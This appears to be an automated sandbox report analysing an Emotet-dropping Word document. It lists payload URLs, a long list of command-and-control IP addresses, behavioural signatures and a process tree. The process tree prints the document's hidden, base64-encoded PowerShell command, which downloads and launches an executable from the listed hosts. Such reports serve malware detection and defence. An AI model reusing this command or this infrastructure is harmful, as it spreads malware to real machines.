Analysis
-
max time kernel
109s -
resource
win10v191014 -
submitted
17-12-2019 22:54
Task
task1
Sample
Docs_5febafdc1237b313e8bf61a859e9cc1b.23.doc
Resource
win7v191014
General
Malware Config
Extracted
http://amstaffrecords.com/individualApi/0/
http://foozoop.com/wp-content/Qxi7iVD/
http://7arasport.com/validatefield/gj/
http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/
https://diagnostica-products.com/wp-admin/hio2u7w/
Extracted
emotet
173.247.19.238:80
174.81.132.128:80
211.44.35.111:80
165.227.156.155:443
167.99.105.223:7080
67.225.179.64:8080
176.31.200.130:8080
104.131.11.150:8080
68.118.26.116:80
190.226.44.20:21
120.150.246.241:80
92.222.216.44:8080
73.214.99.25:80
110.142.38.16:80
24.93.212.32:80
190.53.135.159:21
66.209.97.122:8080
173.91.11.142:80
100.14.117.137:80
2.237.76.249:80
104.137.176.186:80
47.6.15.79:80
62.75.187.192:8080
47.156.70.145:80
201.173.217.124:443
104.131.44.150:8080
186.75.241.230:80
31.131.182.30:80
107.170.24.125:8080
110.143.84.202:80
75.80.148.244:80
186.67.208.78:8080
104.236.246.93:8080
45.51.40.140:80
45.33.49.124:443
74.105.102.97:8080
70.46.247.81:80
59.103.164.174:80
110.143.57.109:80
31.31.77.83:443
192.241.255.77:8080
195.244.215.206:80
144.139.247.220:80
103.86.49.11:8080
61.197.110.214:80
91.242.138.5:443
101.187.134.207:443
73.11.153.178:8080
190.12.119.180:443
5.196.74.210:8080
209.141.54.221:8080
169.239.182.217:8080
2.38.99.79:80
197.254.221.174:80
85.72.180.68:80
179.13.185.19:80
183.102.238.69:465
149.202.153.252:8080
64.53.242.181:8080
2.235.190.23:8080
174.77.190.137:8080
182.176.132.213:8090
167.71.10.37:8080
138.59.177.106:443
218.44.21.114:80
46.105.131.87:80
87.230.19.21:8080
37.157.194.134:443
83.136.245.190:8080
178.210.51.222:8080
108.179.206.219:8080
93.147.141.5:80
178.209.71.63:8080
64.147.15.138:80
12.176.19.218:80
128.65.154.183:443
108.191.2.72:80
217.160.182.191:8080
37.59.24.177:8080
78.24.219.147:8080
212.64.171.206:80
87.106.136.232:8080
211.63.71.72:8080
81.0.63.86:8080
80.21.182.46:80
210.6.85.121:80
188.152.7.140:80
206.189.112.148:8080
70.175.171.251:80
190.147.215.53:22
212.129.24.79:8080
98.24.231.64:80
189.209.217.49:80
91.73.197.90:80
116.48.142.21:443
209.97.168.52:8080
181.57.193.14:80
73.176.241.255:80
173.12.14.133:8080
139.130.241.252:443
200.7.243.108:443
85.152.174.56:80
165.228.24.197:80
159.65.25.128:8080
176.106.183.253:8080
5.88.182.250:80
59.148.227.190:80
31.172.240.91:8080
58.171.42.66:8080
91.205.215.66:443
1.33.230.137:80
82.155.161.203:80
95.128.43.213:8080
47.6.15.79:443
201.184.105.242:443
86.98.156.239:443
190.220.19.82:443
66.34.201.20:7080
87.106.139.101:8080
50.116.86.205:8080
5.154.58.24:80
201.251.133.92:443
101.187.247.29:80
206.81.10.215:8080
60.40.74.197:80
Signatures
-
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 5048 WINWORD.EXE 4040 873.exe 4256 873.exe 4240 stucktextto.exe 4196 stucktextto.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4432 wrote to memory of 4040 4432 Powershell.exe 79 PID 4040 wrote to memory of 4256 4040 873.exe 80 PID 4240 wrote to memory of 4196 4240 stucktextto.exe 82 -
Executes dropped EXE 4 IoCs
pid Process 4040 873.exe 4256 873.exe 4240 stucktextto.exe 4196 stucktextto.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5048 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4432 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4432 Powershell.exe 4196 stucktextto.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4256 873.exe 4196 stucktextto.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 stucktextto.exe File renamed C:\Users\Admin\873.exe => C:\Windows\SysWOW64\stucktextto.exe 873.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat stucktextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 stucktextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE stucktextto.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies stucktextto.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5048 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_5febafdc1237b313e8bf61a859e9cc1b.23.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:5048
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABOAHAAegBmAHIAbgB6AGIAcgB0AGkAdQBtAD0AJwBWAGYAZgB1AHcAeQBoAHkAaQBnAGkAeQBxACcAOwAkAEUAcwB4AHQAeQBkAGoAcABrACAAPQAgACcAOAA3ADMAJwA7ACQAWQBsAG4AagBxAHMAcwBjAG0AcABtAD0AJwBXAHkAbABxAGEAaQBkAGsAcQBhACcAOwAkAEkAbQB4AGYAcgB4AHQAYQBwAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEUAcwB4AHQAeQBkAGoAcABrACsAJwAuAGUAeABlACcAOwAkAFIAcgB5AGkAcABqAGYAaABkAD0AJwBZAHQAaQBkAG4AYwBpAGcAbABlACcAOwAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0APQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AVwBFAEIAYwBMAEkAZQBOAFQAOwAkAEcAcABjAGsAeQBzAGMAeQBhAGUAbgBkAHoAPQAnAGgAdAB0AHAAOgAvAC8AYQBtAHMAdABhAGYAZgByAGUAYwBvAHIAZABzAC4AYwBvAG0ALwBpAG4AZABpAHYAaQBkAHUAYQBsAEEAcABpAC8AMAAvACoAaAB0AHQAcAA6AC8ALwBmAG8AbwB6AG8AbwBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUQB4AGkANwBpAFYARAAvACoAaAB0AHQAcAA6AC8ALwA3AGEAcgBhAHMAcABvAHIAdAAuAGMAbwBtAC8AdgBhAGwAaQBkAGEAdABlAGYAaQBlAGwAZAAvAGcAagAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAyAC4AZQBrAHQAbwBuAGUAbgBkAG8AbgAuAGcAcgAvAGMAZwBpAC0AYgBpAG4ALwBtAFQAVABDAEYAbQBWAGUALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGkAYQBnAG4AbwBzAHQAaQBjAGEALQBwAHIAbwBkAHUAYwB0AHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAaQBvADIAdQA3AHcALwAnAC4AIgBzAGAAUABMAGkAdAAiACgAJwAqACcAKQA7ACQASQB4AGkAcQBvAGcAZgBpAGsAbQA9ACcAQgB0AHQAeABnAGgAdgBpAG4AbwBtAHcAcwAnADsAZgBvAHIAZQBhAGMAaAAoACQATQBiAGMAbgB6AGcAcwBwAGEAdAAgAGkAbgAgACQARwBwAGMAawB5AHMAYwB5AGEAZQBuAGQAegApAHsAdAByAHkAewAkAFUAdwB1AGQAcgBtAG8AZwBqAGwAbwBzAG0ALgAiAEQATwBXAGAATgBMAE8AYABBAEQAYABGAEkAbABFACIAKAAkAE0AYgBjAG4AegBnAHMAcABhAHQALAAgACQASQBtAHgAZgByAHgAdABhAHAAbwApADsAJABIAGgAdABvAGIAZgBmAHAAbABnAHMAPQAnAFgAYQB5AG0AcABpAGMAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAbQB4AGYAcgB4AHQAYQBwAG8AKQAuACIAbABgAEUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIANwAxADYAOQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAdAAiACgAJABJAG0AeABmAHIAeAB0AGEAcABvACkAOwAkAEUAaQBkAHkAdABrAGwAeQA9ACcAWQBiAHEAeABjAHUAdgBkAGkAcQBuACcAOwBiAHIAZQBhAGsAOwAkAEwAbQBxAGEAaABqAGMAdwB5AHcAdABrAD0AJwBHAHcAYQB1AHUAaABsAHoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATwBuAG8AZwBxAGIAdQBtAG8APQAnAEwAZABrAGUAbwBnAHMAYQBmAHgAbgBqACcA1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4432 -
C:\Users\Admin\873.exe"C:\Users\Admin\873.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4040 -
C:\Users\Admin\873.exe--30b989523⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4256
-
-
-
C:\Windows\SysWOW64\stucktextto.exe"C:\Windows\SysWOW64\stucktextto.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4240 -
C:\Windows\SysWOW64\stucktextto.exe--e6ccfa5a2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
PID:4196
-